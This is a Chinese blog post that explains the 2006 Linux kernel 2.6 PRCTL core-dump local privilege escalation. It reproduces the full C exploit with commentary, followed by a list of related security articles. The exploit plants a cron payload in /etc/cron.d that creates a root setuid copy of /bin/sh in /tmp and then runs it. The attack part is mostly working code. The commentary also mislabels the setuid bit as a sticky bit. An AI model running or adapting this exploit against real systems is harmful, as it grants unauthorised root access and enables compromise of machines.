linux漏洞分析,linux一个漏洞的分析

最新推荐文章于 2024-05-29 10:45:18 发布
最新推荐文章于 2024-05-29 10:45:18 发布
阅读量308 收藏
点赞数
文章标签: linux漏洞分析

程序最早是国外的大佬写的。这个漏洞的原理非常简单,就是利用coredump的时候,可以在/etc/cron.d目录下生成core文件。

而在/etc/cron.d目录下的文件,crontab会定时以指定的用户权限来执行。如果在core文件中,指定用户权限是root,那么

就能够以我们希望的方式来运行所有的程序了。

下面就程序进行分析。

#include

#include

#include

#include

#include

#include

#include

char *payload="/nSHELL=/bin/sh/nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin/n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh /n";

/* 在coredump生成的core文件中,就会出现payload的字符。也就是说,在core文件中,会有下面的几行文件。

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh

最后一行,如果熟悉crontab的配置,就知道这是crontab的文件格式,每分钟以root的身份执行一次后面的代码。

注意最后的chmod 4755 /tmp/sh,4755是标准的粘连位的设置。这样,任何执行/tmp/sh都将获得root权限。

*/

int main() {

int child;

struct rlimit corelimit;

printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t/n");

printf("By: dreyer & RoMaNSoFt/n");

printf("[ 10.Jul.2006 ]/n/n");

corelimit.rlim_cur = RLIM_INFINITY;

corelimit.rlim_max = RLIM_INFINITY;

setrlimit(RLIMIT_CORE, &corelimit);

/*用setrlimit使得生成core文件的大小不受限制,这个函数改变linux kernel对于一些资源的限制*/

printf("Creating Cron entry/n");

if ( !( child = fork() )) {

chdir("/etc/cron.d");

/*改变目录,使生成的文件在/etc/cron.d目录下*/

prctl(PR_SET_DUMPABLE, 2);

/*使内核可以生成core文件*/

sleep(200);

exit(1);

}

kill(child, SIGSEGV);

/*使child process core dump*/

printf("Sleeping for aprox. one minute (** please wait **)/n");

sleep(62);

/*等待crontab去运行生成的core 文件*/

printf("Running shell (remember to remove /tmp/sh when finished) .../n");

system("/tmp/sh -p");

/*运行/tmp/sh,由于/tmp/sh所有人是root,设置了粘连位,所以任何运行此程序的人都将获得root权限*/

}

结束以后,请记得删除/etc/cron.d/目录下的core文件,和/tmp/sh文件。

Sashac Yuan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf中linux内核态的漏洞挖掘与利用系列(一)
老司机的后备箱
08-10 420
该系列文章主要是从ctf比赛入手,针对linux内核上的漏洞分析、挖掘与利用做讲解,本篇文章主要介绍内核漏洞利用所需的前置知识以及准备工作。
Linux常见漏洞修复教程!
高性价比服务器就选:蓝易云
06-30 1033
请注意,漏洞修复的具体方法和措施取决于特定的漏洞和系统配置。建议您根据具体情况进行进一步研究和采取相应的安全措施。如果不确定如何修复特定漏洞,请参考相关厂商的安全公告和文档,或者咨询安全专家。修复Linux系统中的常见漏洞是确保系统安全性的重要步骤。
Linux近两年高危漏洞修复过程记录
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-28 2022
另外,对于一个大规模的补丁安装,还可以使用脚本的方式,将所有的补丁文件集中到脚本中,这样可以实现大规模的补丁安装。修复措施:目前该漏洞已经修复,https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?下载地址:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/refs/,打补丁fs/overlayfs/copy_up.c。
解决方案-linux内核漏洞-0基础白客知识点
最新发布
程序员六七的博客
05-29 835
二、相关系统调用实现(一)pipe系统调用实现调用pipe()创建一个管道,返回两个文件描述符,fd[1]为读,fd[2]为写。这里以linux-5.16.10内核代码为例
最全linux查找漏洞武器大全,快来挑一件你趁手的兵器吧
IT运维技术圈
02-22 1534
Linux下有多种工具和软件可以用来查找系统中的漏洞。以下是一些常用的工具,它们有免费的版本,也有提供更高级的付费版本:1. Nessus简介:Nessus 是一款广泛使用的漏洞扫描工具,能够检测网络设备、操作系统、数据库、应用程序中的漏洞。免费版本:提供个人使用的免费版本 Nessus Essentials。下载地址:https://www.tenable.com/products/nessus...
【已复现】Linux Kernel权限提升漏洞(CVE-2023-3269)安全风险通告
smellycat000的专栏
08-10 520
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Linux Kernel 权限提升漏洞漏洞编号QVD-2023-15242、CVE-2023-3269公开时间2023-07-05影响对象数量级万级奇安信评级高危CVSS 3.1分数7.8威胁类型权限提升利用可能性中POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开利用条件:需要本地低权限触发。(注:奇安信CERT的漏洞...
最新Linux漏洞分析及其解决方案.pdf
09-07
《最新Linux漏洞分析及其解决方案》 Linux操作系统以其开源、稳定和安全性著称,近年来在服务器市场取得了显著成绩,成为仅次于Windows NT的操作系统。然而,正如任何软件一样,Linux也并非完全无懈可击。这篇文章...
Linux漏洞扫描工具lynis使用方法解析
09-14
Linux漏洞扫描工具Lynis是针对Unix系统的安全审计和加固工具,它可以帮助用户发现系统中的潜在安全问题并提供加固建议。Lynis不仅能够扫描一般系统信息,脆弱的软件包,还能够检测潜在的错误配置,同时具备入侵检测...
ICMP timestamp请求响应漏洞 修复 Traceroute探测漏洞 修复 linux 7
04-09
ICMP timestamp请求响应漏洞 修复 Traceroute探测漏洞 修复 使用firewall-cmd打开关闭防火墙与端口 linux 7 ICMP timestamp请求响应漏洞 修复 Traceroute探测漏洞 修复 使用firewall-cmd打开关闭防火墙与端口 linux ...
利用lynis如何进行linux漏洞扫描详解
09-15
一个基本的全系统扫描可以通过以下命令完成: ```bash sudo lynis audit system ``` 这将执行一系列全面的检查,包括安全配置、软件更新和潜在漏洞。 ### 扫描结果与报告 Lynis 的扫描结果会以标准输出的形式...
近期UNIX/Linux漏洞.pdf
09-06
本文将对近期的一些UNIX/Linux漏洞进行总结和分析。 1. HP-UX Ignite—UX远程非授 权访问及权限提升漏洞 HP-UX Ignite-UX服务器实现上存在漏洞,远程攻击者可能利用此漏洞获取root用户的访问权限。这是由于Ignite...
Linux提权之内核漏洞提权篇
m0_74282605的博客
03-30 924
在渗透过程中,有时利用某些漏洞可以获取一个低权限的用户,然后想办法提权,提升到root用户权限,从而控制整个系统。在获取到低权限shell后,通常会检查操作系统的发行版本、内核版本,老版本的系统可能会存在一些漏洞,于是我们可以利用这些版本漏洞进行提权。下面给大家带来的是一些内核提权的例子。今天简单向大家讲解了利用内核漏洞去进行提权的操作,可以发现内核漏洞最主要的就是信息获取后寻找对应的内核漏洞再去攻击,因为内核漏洞有很多所以就挑出了两个常见而且常用的来给大家演示一下,如果对本文感兴趣不妨一键三连。
速修复!Linux 内核严重漏洞影响所有 Linux 配置
smellycat000的专栏
07-07 692
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今年六月中旬,一名安全研究员发现并向 Linux 管理员报告了一个位于 Linux 内核中的一个严重漏洞 (CVE-2023-3269),它影响 Linux 内核6.1至6.4,可使攻击者在受影响系统上提升权限。影响所有 Linux 配置北京大学的安全研究员 Ruihan Li 发现了该漏洞,并表示它影响几乎所有 Linux 内核配置且触发仅需最...
漏洞预警】Linux kernel权限提升漏洞(CVE-2024-1086)
热门推荐
qq_18209847的博客
04-08 1万+
Linux内核版本v5.14 – v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,本地低权限威胁者可利用该漏洞将权限提升为root。加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。
实验二:Linux主机漏洞利⽤攻击实践
yyj1781572的博客
01-31 778
samba服务远程溢出漏洞 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成,samba服务对应的端口有139、445等等。
Linux漏洞公告 | Linux内核漏洞CVE-2020-14386安全更新
shanxun1012的专栏
05-05 351
升级-Centos Yum Security Update只更新安全补丁//只安装最安全的安全更新,忽略所有可能包含不安全新功能的包。
linux 漏洞CVE-2019-14287和CVE-2021-4034
任雪飘的博客
02-26 4909
大家好,我是任雪飘,一个刚接触web的菜鸡。我们今天一起复现一下linux老版本漏洞,普通用户利用sudo获得系统root权限操作系统! 现在我们重新创建一个新用户 给这个用户设置策略,就是不给他root权限,气死你 ceshi1 这个账号确实没有了root 权限的身份了 现在我们测试这个漏洞是不是存在 既然是root 权限了,那我们修改其他用户的密码吧!看下图是不是完美了 到此处CVE-2019-14287 漏洞复现完毕。 接下 下来我们就要去玩脚本...
linux漏洞利用
zhaji001
09-05 7146
缓存区溢出: EBP基址指针寄存器,ESP栈指针基础器. EBP指向进程的当前栈帧的底部,ESP总是指向栈顶.栈是从内存高地址处向低地址反向增长. #include <stdio.h> greeting(char *temp1, char *temp2){ char name[400]; strcpy(name, temp2); printf("Hello %s %s\...
linux环境下常见漏洞利用技术,linux常见漏洞利用技术实践
weixin_33411550的博客
05-10 476
0x01 前言1.1 目的1.1.1 写这篇文章一是总结一下前段时间所学的东西,二是给pwn还没入门的同学一些帮助,毕竟自己学的时候还是遇到不少困难以下都是我的实际操作,写的比较详细,包含了我自己的一些经验,欢迎大家指点.1.1.2 内容包含利用跳板劫持流程,GOT覆写 ,ret2libc等技术1.2 预备1.2.1工具1.2.1.1 ida反汇编神器,下载地址down.52pojie.cn1.2...
kalilinux漏洞分析
08-29
Kalilinux一个基于Debian的Linux发行版,主要用于渗透测试和漏洞分析漏洞分析是指对软件或系统中的漏洞进行研究和分析,以了解其原理和潜在的风险。 在Kalilinux中,你可以使用各种工具和技术来进行漏洞分析。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值